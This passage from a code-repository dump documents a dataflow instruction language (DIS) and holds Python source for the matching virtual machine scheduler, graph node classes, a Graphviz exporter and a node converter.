are the simplest instructions available. A sink is a simple link between a from and a to. It will send whatever input it receives on a port to the destination for that port.\n\nSinks are mainly used to have a static point in the program that can catch input (such as the start of a function). A sink takes no arguments, since its behavior is defined by its destinations, which are added through links.\n\n#### Switch\n\nA Switch allows us to change the destination of a token depending on a condition. A switch stores all the tokens that it receives until its destination is determined. Once the destination is determined, all the stored tokens are sent to this destination. Further tokens that are received will also be sent to the same destination.\n\nThe destination is determined by a token that arrives at port 0. This token carries an index, which corresponds to a destination in the *destination list* of the switch.\n\nA Switch only modifies the destination address of the tokens it receives; it does not touch the port. Sinks should be used when redirection is required.\n\nA Switch is declared in the following manner:\n\n    INST SW <idx> <destination list>\n\nA destination list looks like this:\n\n    <chunk 0> <address 0> <chunk 1> <address 1> ... <chunk n> <address n>\n\nSimply put, a destination list is a list of chunk, address pairs; their order determines the index that they are assigned to. \n\nFor instance, in the following example:\n\n    INST SW 0 0 22 1 5\n\nIndex 0 would correspond to sending further tokens to instruction (0, 22), while index 1 would correspond to sending the tokens to instruction (1, 5).\n\n#### ContextChange\n\nA context change instruction changes the context of a token. Look into the [documentation](\\ref core::instruction::ContextChange) for further information.\n\nA context change instruction takes 4 arguments:\n * Amount of binds, the amount of tokens that will \"enter\" the context change.\n * Amount of restores, the amount of tokens that will be returned to the return sink.\n * Address of a sink, which will be the destination of any token that enters the instruction. \n * Address of a return sink, which will catch anything that is returned when the context is restored. 
\n\nThus a context change will look like this:\n\n    INST CC <idx> <binds> <restores> <address> <address>\n\nSuch an address is similar to a link address:\n\n    <chunk> <instruction>\n\nThus a context change instruction is added in the following manner:\n\n    INST CC 2 2 1 0 4 0 3\n\n#### Context Restore\n\nA context restore finds the return instruction of a token based on its context and sends it to that location. It can be compared to a return from a call. Once again, we refer to the [documentation](\\ref core::instruction::ContextRestore) for additional information.\n\nA context restore takes no arguments.\n\n#### Operation Instruction\n\nAn operation instruction represents an operation on the data of a set of tokens. It takes an opcode, which represents the operation it performs, and a number detailing the amount of inputs it should receive. It ends up looking like this:\n\n    INST OP <idx> <opCode> <inputs>\n\nExample:\n\n    INST OP 0 1 2\n\nThe opCodes can be found in the [appendix](#Operations).\n\n#### Constant Instruction\n\nA constant instruction is an instruction that will always return the same result, regardless of the input. This operation should only be used if a literal cannot be eliminated from the program. A constant instruction should also only receive a single token from the same context, or it will resend its result.\n\nA constant takes its value as an argument and is declared in the following way:\n\n    INST CO <idx> <= <value>\n\nFor the possible values, check the [literals](#Literals) section. Constant instructions should only be used when it is not possible to add this value as a literal to the program in another way.\n\n#### Entry and Exit point\n\nIn order to communicate with the outside world, the DVM needs to have a predefined entry and exit point to the program. These are added by using a special instruction that can only be used for this purpose. These special instructions have to be placed at predefined locations.\n\nThe entry point of the program should be located in chunk 0 at address 0, while the exit point should be located at chunk 0 at address 0. These points are added through the program begin and program end points. The program entry point should also define the amount of inputs the program accepts.\n\nentry point: \n\n    INST PB 0 <inputs>\n\nexit point:\n\n    INST PE 0\n \n## Literals {#Literals}\n\nSome instructions can take some arguments that are known in advance. Examples are additions where one of the elements is already known, or function calls with a few predefined arguments. It's important to know that every instruction needs at least one unknown attribute, an attribute which is not a literal. Any instruction that only accepts literals should be precomputed.\n\nA literal is defined with the following statement:\n\n    LITR <instruction> <port> <= <value>\n\nWhere instruction is the index of an instruction, which is located in the current chunk. Port is the idx of the port where the literal will end up, and value is the value of the literal. Thus adding a literal to an instruction at address 0 at port 1 is done in the following way:\n\n    LITR 0 1 <= \"A literal string\"\n\nLiterals can only be added to operation and context change instructions. 
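\n\nAs a quick, hypothetical illustration, an addition with one operand fixed in advance could be written as follows (the add mnemonic is taken from the opcode appendix below; whether opcodes are spelled as mnemonics or as numbers should be treated as an assumption and checked against the generator you use):\n\n    INST OP 3 add 2\n    LITR 3 1 <= 5\n\nWith this fragment, port 1 of the operation at index 3 is filled in at load time, and only port 0 still has to be supplied by a token.\n\n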
The following table defines the various types that can be defined as literals.\n\nType | Example \n--------|---------\nBool | True\nNumber | 1298\nString | \"Hello World\"\nArray | [21, \"test\"]\n\n## Trivial Programs {#Trivial}\n\nSome programs do not need any external input to complete; in this case, the dataflow semantics do not allow DVM to actually execute anything. This is why the triv statement is introduced. If a program can be completely predetermined, its value can be defined by using the triv statement. \n\nThe triv statement is similar to a literal without a real destination. Instead, upon program start, the runtime will see if we have encountered any trivial statements. If we did, we simply return the value and stop execution. Only one triv statement should be present in a dis file.\n\nA trivial program is defined with the following statement:\n\n    TRIV <= <value>\n\nThus the program\n\n    TRIV <= 42\n\nwill never really execute and just return 42 instead.\n\n# An Example {#Example}\n\nThe example below presents the DIS code for a program that contains most of the available DIS functionality while still remaining simple.\n\n~~~~\nfunction add(x, y, z):\n\treturn x + y + z + 5\nend function\n\nfunction Main(x, y):\n\treturn add(x, y, 4)\nend function\n~~~~\n\n\\include example.dis\n\n# Appendix: Operations {#Operations}\n\nopCode | Operation\n------------|-----------\nvoid | natives::dvm_Void\nbool | natives::dvm_Bool\nint | natives::dvm_Int\nfloat | natives::dvm_Float\nstring | natives::dvm_String\narray | natives::dvm_Array\nnoOp | natives::dvm_noOp\nisVoid | natives::dvm_isVoid\nequals | natives::dvm_equals\nnotEq | natives::dvm_notEqual\nand | natives::dvm_and\nor | natives::dvm_or\nxor | natives::dvm_xor\nnot | natives::dvm_not\nadd | natives::dvm_add\nsub | natives::dvm_sub\nmul | natives::dvm_mul\ndiv | natives::dvm_div\nfloor | natives::dvm_floor\nceil | natives::dvm_ceil\nmin | natives::dvm_min\nmax | natives::dvm_max\nless | natives::dvm_less\nmore | natives::dvm_more\nlessEq | natives::dvm_less_eq\nmoreEq | natives::dvm_more_eq\nstrContains | natives::dvm_str_contains\nstrFind | natives::dvm_str_find\nstrUpper | natives::dvm_str_upper\nstrLower | natives::dvm_str_lower\nstrSub | natives::dvm_str_sub\nstrRev | natives::dvm_str_reverse\nstrApp | natives::dvm_str_append\narrEmpty | natives::dvm_arr_isEmpty\narrLen | natives::dvm_arr_length\narrEmpty | natives::dvm_arr_empty\narrCreate | natives::dvm_arr_create\narrGet | natives::dvm_arr_get\narrSet | natives::dvm_arr_set\narrIns | natives::dvm_arr_insert\narrRepl | natives::dvm_arr_replace\narrCat | natives::dvm_arr_catenate\narrFrnt | natives::dvm_arr_add_front\narrBck | natives::dvm_arr_add_back\narrSub | natives::dvm_arr_sub" }, { "alpha_fraction": 0.7319725751876831, "alphanum_fraction": 0.7375773787498474, "avg_line_length": 31.51785659790039, "blob_id": "8321ff71b9fcc0f48077b9d8d9507e120e4d499d", "content_id": "5572d6ca940dbec2600a352a8c1313170386cfa6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1821, "license_type": "no_license", "max_line_length": 79, "num_lines": 56, "path": "/DVM/core/scheduler.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# scheduler.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to 
deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.scheduler\n# \\brief DVM instruction scheduler\n#\n# This module defines the scheduler.\n# The scheduler is responsible for deciding when and how\n# to execute an instruction.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# DVM Scheduler\n#\n# Decides when and how to execute an instruction.\n##\nclass Scheduler(object):\n\tdef __init__(self, core):\n\t\tsuper(Scheduler, self).__init__()\n\t\tself.core = core\n\t\t\n\tdef schedule(self, inst, args):\n\t\ttry:\n\t\t\tinst = self.core.memory.get(inst)\n\t\texcept KeyError:\n\t\t\tlog.error(\"Encountered token(s) with faulty destination! %s\", args)\n\t\telse:\n\t\t\tlog.info(\"Scheduling: %s\", inst)\n\t\t\tinst.execute(args, self.core)\n" }, { "alpha_fraction": 0.6694287061691284, "alphanum_fraction": 0.6726268529891968, "avg_line_length": 24.201465606689453, "blob_id": "33fa7e312edb52198824f871b62a9be905e71602", "content_id": "10b480fea7da6c3adc42429d7cc65849b18a0af2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6879, "license_type": "no_license", "max_line_length": 82, "num_lines": 273, "path": "/DISc/IGR/node.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# nodes.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.node\n# \\brief Node definitions\n# \n# IGR node types. 
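\n#\n# A minimal usage sketch (all names here are hypothetical, for illustration only):\n#\n#   node = OperationNode(someSubGraph, 'add') # 'add' is an assumed operation name\n#   port = node.getInputPort(0)               # ports are created on demand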
\n##\n\nimport port\nimport copy\n\n# ------------------ #\n# Unique Identifiers #\n# ------------------ #\n\n__KEY__ = 0\n\n##\n# Generate unique id.\n#\n# Generate a key that serves as a unique\n# id for a node.\n# Mainly useful for debugging purposes.\n##\ndef getKey():\n\tglobal __KEY__\n\ti = __KEY__\n\t__KEY__ += 1\n\treturn i\n\n# ----- #\n# Nodes #\n# ----- #\n\n##\n# Standard node.\n#\n## \nclass Node(object):\n\n\t##\n\t# Create a new node.\n\t#\n\t# \\param subGraph\n\t#\t\tThe subgraph this node belongs to.\n\t# \\param inputs\n\t#\t\tThe amount of inputs this node will accept.\n\t#\t\tThis argument is optional; the input amount\n\t# \t\twill be updated depending on the amount of \n\t#\t\tincoming edges.\n\t# \\param outputs\n\t#\t\tThe amount of outputs this node will return.\n\t#\t\tThe same rules that apply to inputs apply here.\n\t##\n\tdef __init__(self, subGraph, inputs = 0, outputs = 0, key = None):\n\t\tsuper(Node, self).__init__()\n\t\tself.subGraph = subGraph\n\t\tself.key = getKey()\n\t\tself.inputs = inputs\n\t\tself.outputs = outputs\n\t\tself.inputPorts = [port.InputPort(self, i) for i in xrange(0,inputs)]\n\t\tself.outputPorts = [port.OutputPort(self, i) for i in xrange(0,outputs)]\n\n\t##\n\t# Create a copy of a node.\n\t# This will create an identical, unique node, \n\t# but with unconnected input and output ports.\n\t##\n\tdef copy(self, subGraph):\n\t\tnode = copy.deepcopy(self)\n\t\tnode.subGraph = subGraph\n\t\tnode.key = getKey()\n\n\t\tnode.inputPorts = [port.InputPort(node, i) for i in xrange(0,node.inputs)]\n\t\tnode.outputPorts = [port.OutputPort(node, i) for i in xrange(0,node.outputs)]\n\n\t\treturn node\n\n\t##\n\t# Create a printable version of the node\n\t##\n\tdef __str__(self):\n\t\tname = self.__class__.__name__\n\t\treturn name + \" \" + \"'\" + str(self.key) + \"'\"\n\n\t##\n\t# Gets an input port. Create it if it doesn't exist yet.\n\t# This allows us to determine the amount of inputs\n\t# a certain node will have, even if this is not explicit in IF1.\n\t#\n\t# \\param idx\n\t# \t\tThe idx of the port you need\n\t# \\return\n\t#\t\tThe port at idx\n\t##\n\tdef getInputPort(self, idx):\n\t\ttry:\n\t\t\tres = self.inputPorts[idx]\n\t\t\treturn res\n\t\texcept IndexError:\n\t\t\tself.inputPorts += [port.InputPort(self, self.inputs)]\n\t\t\tself.inputs += 1\n\t\t\treturn self.getInputPort(idx)\n\n\t##\n\t# Gets an output port. 
Create it if it doesn't exist yet.\n\t# This allows us to determine the amount of outputs\n\t# a certain node will have, even if this is not explicit in IF1.\n\t#\n\t# \\param idx\n\t# \t\tThe idx of the port you need\n\t# \\return\n\t#\t\tThe port at idx\n\t##\n\tdef getOutputPort(self, idx):\n\t\ttry:\n\t\t\tres = self.outputPorts[idx]\n\t\t\treturn res\n\t\texcept IndexError:\n\t\t\tself.outputPorts += [port.OutputPort(self, self.outputs)]\n\t\t\tself.outputs += 1\n\t\t\treturn self.getOutputPort(idx)\n\n\n\t## See if this node can be followed to other nodes.\n\tdef hasNext(self): return True\n\n\t## See if this node can be reached from other nodes.\n\tdef hasPrevious(self): return True\n\n\t## Check if this node is a compound node\n\tdef isCompound(self): return False\n\n\t## Check if this node is a call node\n\tdef isCall(self): return False\n\n\n# --------------------------- #\n# Graph entry and exit points #\n# --------------------------- #\n\n##\n# Entry point of a subgraph.\n# \n# Defines the topmost point of a subgraph.\n# Nodes in the subgraph use this node to get their inputs.\n#\n# This corresponds to the values of the parameters for a function\n# invocation.\n##\nclass SubGraphEntryNode(Node): \n\n\tdef __init__(self, subGraph, outputs):\n\t\tsuper(SubGraphEntryNode, self).__init__(subGraph, 0, outputs)\n\t\tself.inputPorts = []\n\n\tdef getInputPort(self, idx): return None\n\tdef hasPrevious(self): return False\n\n##\n# Exit point of a subgraph.\n# \n# Defines the leaves of a subgraph.\n# Nodes in the subgraph use this node to dump their outputs.\n#\n# This corresponds to the return value of a function.\n##\nclass SubGraphExitNode(Node): \n\n\tdef __init__(self, subGraph, inputs):\n\t\tsuper(SubGraphExitNode, self).__init__(subGraph, inputs, 0)\n\t\tself.outputPorts = []\n\n\tdef hasNext(self): return False\n\tdef getOutputPort(self, idx): return None\n\n# -------------- #\n# Standard Nodes #\n# -------------- #\n\n##\n# Operation node\n#\n# This class defines a standard dataflow operation.\n# It contains the standard input and output ports along with\n# the function that it represents.\n##\nclass OperationNode(Node):\n\tdef __init__(self, subGraph, operation):\n\t\tsuper(OperationNode, self).__init__(subGraph)\n\t\tself.operation = operation\n\n\tdef __str__(self):\n\t\tkey = str(self.key)\n\t\topname = self.operation\n\t\treturn \"OpN '\" + key + \"' \" + opname \n\n##\n# Call node\n#\n# Represents an operation that calls a function (a subgraph).\n# The output ports of the call node are bound to the return values of the function.\n##\nclass CallNode(Node):\n\tdef __init__(self, subGraph, function):\n\t\tsuper(CallNode, self).__init__(subGraph)\n\t\tself.function = function\n\n\tdef __str__(self):\n\t\tfunc = str(self.function)\n\t\treturn \"CallN '%d' %s\" % (self.key, func)\n\n\tdef isCall(self): return True\n\t\n##\n# Constant node\n#\n# Represents an instruction that just\n# forwards its value once it receives input.\n##\nclass ConstantNode(Node):\n\tdef __init__(self, subGraph, value):\n\t\tsuper(ConstantNode, self).__init__(subGraph)\n\t\tself.value = value\n\n\tdef __str__(self):\n\t\treturn \"Const '%d' %s\" % (self.key, self.value)\n\n# -------------- #\n# Compound Nodes #\n# -------------- #\n\n##\n# Compound node\n#\n# Represents a node that contains subgraphs.\n# Examples of such nodes include if-then-else, for loops, ...\n##\nclass CompoundNode(Node):\n\tdef __init__(self, subGraph, type, subGraphs):\n\t\tsuper(CompoundNode, 
self).__init__(subGraph)\n\t\tself.subGraphs = subGraphs\n\t\tself.type = type\n\n\tdef isCompound(self): return True\n\t\n\tdef __str__(self): \n\t\treturn \"C %d: %s\" % (self.key, self.type)" }, { "alpha_fraction": 0.685303270816803, "alphanum_fraction": 0.6870828866958618, "avg_line_length": 26.410568237304688, "blob_id": "ca9520254dba3fd5bf8ceb8ccf004b9b8df34d88", "content_id": "8126581fa9520190a842393eb1c6ee01acae8396", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6743, "license_type": "no_license", "max_line_length": 86, "num_lines": 246, "path": "/DISc/IGR/dot.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dot.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.dot\n# \\brief IGR dot parser\n# \n# This module can return a dot version of the graph.\n# Mainly useful for debugging the compilation process.\n##\n\nimport traverse\n\nimport StringIO\nimport subprocess\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# --------- #\n# Subgraphs #\n# --------- #\n\n##\n# Add the attributes of the subgraph.\n##\ndef subGraphHeader(buffer, subGraph):\n\tname = subGraph.name.replace(\".\", \"_\")\n\tbuffer.write(\"subgraph cluster_\" + name + \" {\\n\")\n\tbuffer.write(\"label = \" + name + \"\\n\")\n\tbuffer.write(\"graph [pencolor = black, bgcolor = white]\\n\")\n\n## \"close\" the subgraph.\ndef subGraphFooter(buffer, subGraph):\n\tbuffer.write(\"}\\n\")\n\n# -------- #\n# Compound #\n# -------- #\n\ndef compoundHeader(buffer, node):\n\tname = str(node.key)\n\tbuffer.write(\"subgraph cluster_compound_\" + name + \" {\\n\")\n\tbuffer.write(\"label = compound_\" + name + \"\\n\")\n\tbuffer.write(\"graph [pencolor = black, bgcolor = lightgrey]\\n\")\n\ndef compoundFooter(buffer, node):\n\tbuffer.write(\"}\\n\")\n\n# ----- #\n# Ports #\n# ----- #\n\n##\n# Get a representation for a port.\n#\n# \\return \n# \t\tReturn the value of the literal, if this port\n#\t\taccepts a literal. * if this port is connected to\n#\t\tanother port. 
Returns the empty string if this port\n#\t\tis not connected to anything\n##\ndef portString(port, preFix = \"\"):\n\tif port.acceptsLiteral(): return str(port.source.value)\n\telif port.isConnected(): return \"<\" + preFix + str(port.idx) + \">\" + \" *\"\n\telse: return \"<\" + preFix + str(port.idx) + \">\"\n\n##\n# String representation of a port list.\n#\n# \\param portLst\n#\t\tThe list with ports, should not be None\n#\n# \\return \n# \t\tReturns a string that will show the values of all the ports\n# \t\tin a horizontal line when parsed by dot.\n# \t\tReturns the empty string if the portLst is None\n##\ndef ports(portLst, prefix = \"\"):\n\tres = \"\"\n\tfor port in portLst:\n\t\tres += \"|\" + portString(port, prefix)\n\treturn \"{\" + res[1:] + \"}\"\n\n## Get the portlist for the inputs of a node.\ndef inputList(node):\n\tif node.inputPorts:\n\t\treturn ports(node.inputPorts, \"I\") + \"|\"\n\telse: return \"\"\n\n## Get the portlist for the outputs of a node.\ndef outputList(node):\n\tif node.outputPorts:\n\t\treturn \"|\" + ports(node.outputPorts, \"O\")\n\telse: return \"\"\n\n# ----- #\n# Nodes #\n# ----- #\n\n## Identifier of the node.\ndef nodeIdentifier(node):\n\treturn str(node.key)\n\n## Convert a connection to a string\ndef edgeStr(srcNode, scrPort, dstNode, dstPort):\n\tsrc = nodeIdentifier(srcNode) + \" : O\" + str(scrPort) \n\tdst = nodeIdentifier(dstNode) + \" : I\" + str(dstPort)\n\treturn src + \" -> \" + dst + \";\"\n\n## Add the label of the node to the buffer. \ndef nodeLabel(buffer, node):\n\tbuffer.write(nodeIdentifier(node))\n\tbuffer.write(' [')\n\tbuffer.write('label=\"' + '{' + inputList(node) + str(node) + outputList(node) + '}\"')\n\tif node.isCompound(): buffer.write(\"style = filled, fillcolor = lightgrey\")\n\tif node.isCall(): buffer.write(\"style = dashed\")\n\tbuffer.write('];\\n')\n\n## Add all the outgoing edges of a node to the buffer.\ndef nodeLinks(buffer, node):\n\tif node.hasNext():\n\t\tfor port in node.outputPorts:\n\t\t\tfor target in port.targets:\n\t\t\t\tbuffer.write(edgeStr(node, port.idx, target.node, target.idx) + \"\\n\")\n\n## Write the information of a node to the buffer\ndef node(buffer, node):\n\tnodeLabel(buffer, node)\n\tnodeLinks(buffer, node)\n\n# --- #\n# Dot #\n# --- #\n\n## Write general dot information\ndef dotHeader(buffer):\n\tbuffer.write(\"digraph IGR {\\n\")\n\tbuffer.write(\"graph [compound=true, dpi = 300];\\n\")\n\tbuffer.write(\"node [shape=record];\\n\")\n\n## Close the dot graph\ndef dotFooter(buffer):\n\tbuffer.write(\"}\")\n\n## Create the dot string\ndef getDot(skipCompound):\n\tbuffer = StringIO.StringIO()\n\tdotHeader(buffer)\n\n\ttraverse.traverse(\n\t\tlambda nd: node(buffer, nd),\n\t\tlambda sg: subGraphHeader(buffer, sg),\n\t\tlambda sg: subGraphFooter(buffer, sg),\n\t\tskipCompound,\n\t\tlambda nd: compoundHeader(buffer, nd),\n\t\tlambda nd: compoundFooter(buffer, nd)\n\t)\n\n\tdotFooter(buffer)\n\tstr = buffer.getvalue()\n\tbuffer.close()\n\treturn str\n\n##\n# Get the dot representation and \n# write it to a file.\n##\ndef dotToFile(path, skipCompound = True):\n\tf = open(path, 'w')\n\tf.write(getDot(skipCompound))\n\tf.close()\n\n##\n# Convert the IGR graph to dot, save it,\n# and run dot on this file. 
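\n#\n# A hypothetical invocation (all values below are illustrative):\n#\n#   dot(format = \"svg\", output = \"igr.svg\", skipCompound = False)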
\n#\n# This function should be called with keyword arguments.\n# The default arguments will cause the following behaviour:\n# \t\t* dot is assumed to be in your PATH.\n#\t\t* the dot file will be saved in igr.dot\n#\t\t* the output will be in png format.\n#\t\t* dot will decide where to store the output.\n#\t\t\tWith the default settings this would be in igr.dot.png\n#\n# \\param dotpath\n#\t\tThe path of the dot executable, in case it's not in your PATH\n# \\param path\n#\t\tThe location where the dot file will be stored.\n# \\param format\n#\t\tThe output format of the graph dot creates from the dot file.\n# \\param output\n#\t\tThe location where we store the output of dot.\n#\t\tLeaving this blank will pass the -O option.\n#\t\tThe -O option lets dot choose the path.\n# \\param other\n#\t\tAny other options you want to pass to dot.\n#\t\tThese options should be passed as a list of strings.\n# \\param skipCompound \n#\t\tTrue if you do not want to display the compound nodes.\n##\ndef dot(\n\tdotpath = \"dot\",\n\tpath = \"igr.dot\", \n\tformat = \"png\", \n\toutput = \"\", \n\tother = [], \n\tskipCompound = True\n\t):\n\n\tdotToFile(path, skipCompound)\n\n\tformat = \"-T\" + format\n\n\tif output: output = \"-o\" + output\n\telse: output = \"-O\"\n\n\ttry:\n\t\tsubprocess.check_call([dotpath, format, path, output] + other)\n\texcept subprocess.CalledProcessError, e:\n\t\tlog.error(\"Dot returned with exit code %d\", e.returncode)\n\texcept OSError:\n\t\tlog.error(\"Dot executable not found\")\n" }, { "alpha_fraction": 0.7108745574951172, "alphanum_fraction": 0.7177790403366089, "avg_line_length": 28.709402084350586, "blob_id": "00f881ef84d92974b54d988feb12f5ea2aa54424", "content_id": "f6e28eb9bd4c84868dae45cd74807882237c0a2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3476, "license_type": "no_license", "max_line_length": 79, "num_lines": 117, "path": "/DISc/backEnd/DVM/nodeConverter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# nodeConverter.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.nodeConverter\n# \\brief IGR node converter\n# \n# This module can convert the various IGR\n# node types into an equivalent DIS statement.\n##\n\nimport IGR\nimport IGR.node\n\ndef addLinks(dis, node):\n\tfromKey = dis.getFromKey(node)\n\n\tfor port in node.outputPorts:\n\t\tfromPort = port.idx\n\n\t\tfor target in port.targets:\n\t\t\ttoKey = dis.getToKey(target.node)\n\t\t\ttoPort = target.idx\n\n\t\t\tdis.addLink(fromKey, fromPort, toKey, toPort)\n\ndef addLiterals(dis, node):\n\tkey = dis.getToKey(node)\n\n\tfor port in node.inputPorts:\n\t\tif port.acceptsLiteral():\n\t\t\tdis.addLiteral(key, port.idx, port.source.value)\n\ndef convertGeneralNode(dis, node, chunk, type, args):\n\tkey = dis.addInstruction(chunk, type, args)\n\tdis.linkNode(node, key, key)\n\treturn key\n\ndef convertPlainNode(dis, node):\n\treturn convertGeneralNode(dis, node, 0, 'SNK', [])\n\ndef convertOpNode(dis, node): \n\treturn convertGeneralNode(dis, node, 1, 'OPR', [node.operation, node.inputs])\n\ndef convertConstantNode(dis, node):\n\treturn convertGeneralNode(dis, node, 0, 'CNS', [\"<=\", node.value])\n\ndef convertSGEntryNode(dis, node):\n\treturn convertGeneralNode(dis, node, 0, 'SNK', [])\n\ndef convertSGExitNode(dis, node): \n\treturn convertGeneralNode(dis, node, 0, 'RST', [])\n\ndef convertCallNode(dis, node):\n\tins = dis.addInstruction(0, 'CHN', [node.inputs, node.outputs])\n\tret = dis.addInstruction(0, 'SNK', [])\n\tdis.linkNode(node, ins, ret)\n\n\tdest = None\n\tnode = IGR.getSubGraph(node.function).entry\n\ttry:\n\t\tdest = dis.getToKey(node)\t\n\texcept KeyError:\n\t\tdest = ('%d', '%d')\n\t\tdis.addCallIdx(node, dis.getIdx(0) - 1)\n\n\tapp = ' '.join(map(str, [dest[0], dest[1], ret[0], ret[1]]))\t\n\tdis.modifyString(0, dis.getIdx(0) - 1, lambda str : \"%s %s\" % (str, app))\n\treturn ins\n\n\nconverters = {\n\tIGR.node.Node : convertPlainNode,\n\tIGR.node.SubGraphEntryNode : convertSGEntryNode,\n\tIGR.node.SubGraphExitNode : convertSGExitNode,\n\tIGR.node.OperationNode : convertOpNode,\n\tIGR.node.CallNode : convertCallNode,\n\tIGR.node.ConstantNode : convertConstantNode,\n}\n\n##\n# Add the DIS equivalent of a certain node\n# to a DIS object.\n#\n# \\param dis\n#\t\tA DIS instance that will contain the DIS version\n#\t\tof the node.\n# \\param node\n#\t\tThe node to convert.\n#\n# \\return The key of the node in DIS.\n##\ndef convertNode(dis, node):\n\treturn converters[type(node)](dis, node)\n" }, { "alpha_fraction": 0.530928373336792, "alphanum_fraction": 0.5457242131233215, "avg_line_length": 62.35034942626953, "blob_id": "0fb2681db85018495defe493d000215eb8d3c7a9", "content_id": "755dd7f5a92215be30b1fed037c99456442593db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 27305, "license_type": "no_license", "max_line_length": 451, "num_lines": 431, "path": "/doc/IF1.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "<!-- Written by Mathijs Saey at the VUB, all rights reserved -->\n\n# IF1 Quick Reference\n\nThis page serves as a basic introduction to the IF1 language.\nThe information on this page is based on the paper: `IF1 - An Intermediate Form for Applicative Languages. 
